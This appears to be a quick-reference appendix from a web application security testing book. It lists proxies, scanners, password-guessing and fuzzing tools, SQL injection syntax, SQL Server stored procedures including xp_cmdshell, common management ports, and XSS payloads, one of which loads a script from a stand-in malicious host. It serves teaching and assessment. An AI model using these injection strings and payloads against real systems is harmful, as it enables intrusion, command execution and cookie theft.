| ||
We've discussed numerous tools and techniques in this book for assessing the security of web applications. This appendix summarizes the most important of these in an abbreviated format designed for use in the field. It is structured around the web hacking methodology that comprises the chapters of this book.
Web Browsers and Open Proxies | |
Internet Explorer | http://www.microsoft.com/ windows /ie/ |
Firefox | http://www.mozilla.com/firefox/ |
Open HTTP/S Proxies | http://www.publicproxyservers.com/ |
IE Extensions for HTTP/S Analysis | |
TamperIE | http://www.bayden.com/ |
IEWatch | http://www.iewatch.com |
IE Headers | http://www.blunck. info /iehttpheaders.html |
IE Developer Toolbar | Search http://www.microsoft.com |
IE 5 Powertoys for | http://www.microsoft.com/windows/ie/previous/ |
WebDevs | webaccess/webdevaccess.mspx |
Firefox Extensions for HTTP/S Analysis | |
LiveHTTP Headers | http://livehttpheaders.mozdev.org/ |
Tamper Data for | http://tamperdata.mozdev.org |
Modify Headers | http://modifyheaders.mozdev.org |
Web Developer Extension for Firefox | http://chrispederick.com/work/webdeveloper/ |
HTTP/S Proxy Tools | |
Burp Intruder | http://portswigger.net/intruder/ |
Fiddler HTTP Debugging Proxy | http://www.fiddlertool.com |
OWASP WebScarab | http://www.owasp.org |
Paros Proxy | http://www.parosproxy.org |
Watchfire PowerTools | http://www.watchfire.com/securityzone/product/powertools.aspx |
Sample Web Applications for Security Testing | |
OWASP/Foundstone SiteGenerator | http://owasp.net/forums/thread/428.aspx |
OWASP WebGoat | http://www.owasp.org/software/webgoat.html |
Foundstone Hacme Bank | http://www.foundstone.com/resources/proddesc/hacmebank.htm |
Foundstone Hacme Books | http://www.foundstone.com/resources/proddesc/hacmebooks.htm |
Command-line Tools | |
curl | http://curl.haxx.se/ |
Netcat | http://www.securityfocus.com/tools |
Sslproxy | http://www.obdev.at/products/ssl-proxy/ |
OpenSSL | http://www.openssl.org/ |
Stunnel | http://www.stunnel.org/ |
Crawling Tools | |
Offline Explorer Pro | http://www.metaproducts.com/ |
Lynx | http://lynx.browser.org/ |
Wget | http://www.gnu.org/directory/wget.html |
Wget for Windows | http://www.interlog.com/~tcharron/wgetwin.html |
Teleport Pro | http://www.tenmax.com/teleport/pro/home.htm |
Black Widow | http://www.softbytelabs.com/BlackWidow/ |
Free Web Application Security Scanners | |
Nikto | http://www.cirt.net/code/nikto.shtml |
N-Stalker NStealth Free Edition | http://www.nstalker.com |
Burp Suite | http://www.portswigger.net |
Paros Proxy | http://www.parosproxy.org |
OWASP WebScarab | http://www.owasp.org |
Commercial Web Application Security Scanners and Services | |
Acunetix Enterprise Web Vulnerability Scanner | http://www.acunetix.com |
Cenzic Hailstorm | http://www.cenzic.com |
Ecyware GreenBlue Inspector | http://www.ecyware.com |
Syhunt Sandcat Suite | http://www.syhunt.com |
SPI Dynamics WebInspect | http://www.spidynamics.com |
Watchfire AppScan | http://www.watchfire.com |
NTObjectives NTOSpider | http://www.ntobjectives.com |
Compuware DevPartner SecurityChecker | http://www.compuware.com |
WhiteHat Security | http://www.whitehatsec.com |
Code Analysis Tools | |
Jad, the Java decompiler | http://www.kpdus.com/jad.html |
Inspector (formerly Bugscan) | http://www.hbgary.com |
CodeAssure | http://www.securesw.com/products/ |
DevInspect | http://www.spidynamics.com/ |
Flawfinder | http://www.dwheeler.com/flawfinder/ |
RATS | http://www.securesw.com/resources/tools.html |
SPLINT | http://lclint.cs. virginia .edu/ |
FXCop | http://www.gotdotnet.com/team/fxcop/ |
ITS4 | http://www. cigital .com/ |
PREfast | Available in Microsoft Visual Studio 2005 |
Prexis | http://www.ouncelabs.com/ |
Coverity | http://www.coverity.com |
DevPartner SecurityChecker | http://www.compuware.com/ |
Inspector (formerly Bugscan) | http://www.hbgary.com |
Binary Analysis | |
Open Reverse Engineering Code | http://www.openrce.org |
Ollydbg | http://www.ollydbg.de |
OllydbgDiscussionForum | http://community. reverse-engineering .net |
IDA Pro | http://www.datarescue.com |
Profiling Tools and Techniques | |
Httprint, the web server fingerprinting tool | http://net-square.com/httprint/ |
Site Digger | http://www.foundstone.com/resources/proddesc/sitedigger.htm |
Wayback Machine | http://web.archive.org |
Google search using "+ www.victim.+com" | Identifying web application structure |
Google search using " related :www.victim.com" | Related web sites |
Google search using "parent directory" robots.txt | Finding robots.txt file |
Authentication | ||
Task | Tool/Technique | Resource |
Local NTLM proxy | NTLM Authentication Proxy Server (APS) | http://www.geocities.com/rozmanov/ntlm/ |
Automated password guessing | WebCracker | http://online.securityfocus.com/tools/706 |
Automated password guessing | Brutus AET2 | http://www.hoobie.net/brutus/index.html |
Automated password guessing | Hydra | http://www.thc.org |
CAPTCHA decoder | PWNtcha | http://sam.zoy.org/pwntcha/ |
Defeating SQL-based authentication | Using a known username, enter FOO' OR 1 = 1 -- in password field | NA |
Authorization/Session Management | ||
Task | Tool/Technique | Resource |
Cookie analysis | CookieSpy | http://camtech2000.net/Pages/CookieSpy.html |
Base64 encode/decode | Perl MIME::Base64 | http://search.cpan.org/search?mode=module&query=MIME%3A%3ABase64 |
MD5 encoding | Perl Digest::MD5 module | http://search.cpan.org/search?mode=module&query=Digest%3A%3AMD5 |
DES encryption/ decryption | mcrypt | http://mcrypt.hellug.gr/ |
DES encryption/ decryption | Perl Crypt::DES module | http://search.cpan.org/search?mode=module&query=Crypt%3A%3ADES |
WebDAV Tools | |
Cadaver, command-line WebDAV client for UNIX/Linux | http://www.webdav.org/cadaver/ |
WebDAV client and server software implementations , listed by University of California, Irvine | http://www.ics.uci.edu/~ejw/authoring/implementation.html |
Web Services/SOAP Tools | |
Web Service Studio | http://www.gotdotnet.com/team/tools/web_svc/default.aspx |
SOAP Tools | http:// soapclient .com/SoapTools.html |
WSDigger | http://www.foundstone.com/resources/proddesc/wsdigger.htm |
Input Validation | ||
Task | Tool/Technique | Resource |
Cross-site scripting tests | XSS Cheat Sheet by RSnake | http://ha.ckers.org/xss.html |
Buffer overflow testing | NTOMax | http://www.foundstone.com |
Fuzzing | SPIKE Proxy | http://www.immunitysec.com |
Fuzzing | SPI Fuzzer | http://www.spidynamics.com |
Security Library | DevInspect and SecureObjects | http://www.spidynamics.com |
Popular Characters to Test Input Validation | ||
Character | URL Encoding | Comments |
' | %27 | The mighty tick mark (apostrophe), absolutely necessary for SQL injection, produces informational errors |
; | %3b | Command separator, line terminator for scripts |
[null] | %00 | String terminator for file access, command separator |
[return] | %0a | Command separator |
+ | %2b | Represents [space] on the URL, good in SQL injection |
< | %3c | Opening HTML tag |
> | %3e | Closing HTML tag |
% | %25 | Useful for double decode, search fields; signifies |
ASP, JSP tag | ||
? | %3f | Signifies PHP tag |
= | %3d | Place multiple equal signs in a URL parameter |
( | %28 | SQL injection |
) | %29 | SQL injection |
[space] | %20 | Necessary for longer scripts |
. | %2e | Directory traversal, file access |
/ | %2f | Directory traversal |
SQL Formatting Characters | Description |
' | Terminates a statement. |
-- | Single line comment. Ignores the remainder of the statement. |
+ | Space. Required to correctly format a statement. |
,@variable | Appends variables . Helps identify stored procedures. |
?Param1=foo&Param1=bar | Creates "Param=foo, bar". Helps identify stored procedures. |
@@@variable | Call an internal server variable. |
| Returns an ODBC error but does not target data. |
SET | Assigns variables. Useful for multiline SQL statements. |
% | A wild card that matches any string of zero or more characters. |
Basic SQL Injection Syntax | |
Query Syntax | Result |
OR 1=1 | Creates true condition for bypassing logic checks. |
UNION ALL SELECT field FROM table WHERE condition | Retrieves all rows from a table if condition is true (e.g., 1=1). |
INSERT INTO Users VALUES('neo', 'trinity') | Can bypass authentication. |
Useful MS SQL Server Variables |
@@@language |
@@microsoftversion |
@@ servername |
@@servicename |
@@version |
Stored Procedures for Enumerating SQL Server | |
Stored Procedure | Description |
sp_columns <table> | Most importantly, returns the column names of a table. |
sp_configure [ name ] | Returns internal database settings. Specify a particular setting to retrieve just that valuefor example, sp_ configure 'remote query timeout (s)'. |
sp_dboption | Views (or sets) user -configurable database options. |
sp_depends <object> | Lists the tables associated with a stored procedure. |
sp_helptext <object> | Describes the object. This is more useful for identifying areas where you can execute stored procedures. It rarely executes successfully. |
sp_helpextendedproc | Lists all extended stored procedures. |
sp_spaceused [object] | With no parameters, returns the database name(s), size , and unallocated space. If an object is specified, it will describe the rows and other information as appropriate. |
sp_who2 [username] | Displays usernames, the host from which they've |
(and sp_who) | connected, the application used to connect to the database, the current command executed in the database, and several other pieces of information. Both procedures accept an optional username. This is an excellent way to enumerate a SQL database's users as opposed to application users. |
MS SQL Parameterized Extended Stored Procedures | |
Extended Stored Procedure | Description |
xp_cmdshell <command> | The equivalent of cmd.exein other words, full command-line access to the database server. Cmd.exe is assumed, so you would only need to enter dir to obtain a directory listing. The default current directory is the %SYSTEMROOT%\System32. |
xp_regread <rootkey>, <key>, <value> | Reads a registry value. |
xp_reg* | There are several other registry-related procedures. Reading a value is the most useful. |
xp_servicecontrol <action>, <service> | Starts or stops a Windows service. |
xp_terminate_process <PID> | Kills a process based on its process ID. |
MS SQL Nonparameterized Extended Stored Procedures | |
Extended Stored Procedure | Description |
xp_loginconfig | Displays login information, particularly the login mode (mixed, etc.) and default login. |
xp_logininfo | Shows currently logged-in accounts. Only applies to NTLM accounts. |
xp_msver | Lists SQL version and platform information. |
xp_enumdsn | Enumerates ODBC data sources. |
xp_enumgroups | Enumerates Windows groups. |
xp_ntsec_enumdomains | Enumerates domains present on the network. |
SQL System Table Objects | |
System Table Object | Description |
syscolumns | All column names and stored procedures for the current database, not just the master. |
sysobjects | Every object (such as stored procedures) in the database. |
sysusers | All of the users who can manipulate the database. |
sysfiles | The filename and path for the current database and its log file. |
systypes | Data types defined by SQL or new types defined by users. |
Default SQL Master Database Tables | |
Master Database Table | Description |
sysconfigures | Current database configuration settings. |
sysdevices | Enumerates devices used for databases, logs, and temporary files. |
syslogins | Enumerates user information for each user permitted to access the database. |
sysremotelogins | Enumerates user information for each user permitted to remotely access the database or its stored procedures. |
sysservers | Lists all peers that the server can access as an OLE database server. |
Common Ports Used for Web Management | |
Port | Typical Service |
21 | FTP for file transfer |
22 | Secure Shell (SSH) for remote management |
23 | Telnet for remote management |
80 | World Wide Web standard port |
81 | Alternate WWW |
88 | Alternate WWW (also Kerberos) |
443 | HTTPS |
900 | IBM Websphere administration client |
2301 | Compaq Insight Manager |
2381 | Compaq Insight Manager over HTTPS |
4242 | Microsoft Application Center Management |
7001 | BEA Weblogic administration |
7002 | BEA Weblogic administration over SSL |
7070 | Sun Java Web Server over SSL |
8000 | Alternate web server or web cache |
8001 | Alternate web server or management |
8005 | Apache Tomcat |
8080 | Alternate web server, or Squid cache control (cachemgr.cgi), or Sun Java Web Server |
8100 | Allaire JRUN |
88x0 | Ports 8810, 8820, 8830, and so on usually belong to ATG Dynamo |
8888 | Alternate web server |
9090 | Sun Java Web Server admin module |
10,000 | Netscape Administrator interface (default) |
Denial of Service | |
DDoS Attacks/tools compiled by David Dittrich | http://staff.washington.edu/dittrich/misc/ddos/ |
DoS Tools and Techniques | http://www.antiserver.it/Denial-Of-Service/ |
Client-side Analysis | ||
Task | Tool/Technique | Resource |
Cross-site scripting testing | ScreamingCSS | http://www.devitry.com/screamingCSS.html |
Cross-site scripting testing | Injecting an IFRAME | <iframe src="[link_to_ executable_content]"></ iframe> |
Cross-site scripting testing | Injecting a META REFRESH | <META HTTP-EQUIV= Refresh CONTENT="1; URL=http://redirect_to_here.com/"> |
Cross-site scripting testing | Inject script elements | <script>document.write(d ocument.cookie)</ script><script>alert('Salut! ')</script> <script src="http://www.malicious-host.foo/badscript.js"></script> |
HTML injection | Inject script using style | <div style= "background:url('javascrip t:alert(1)')"> |
| ||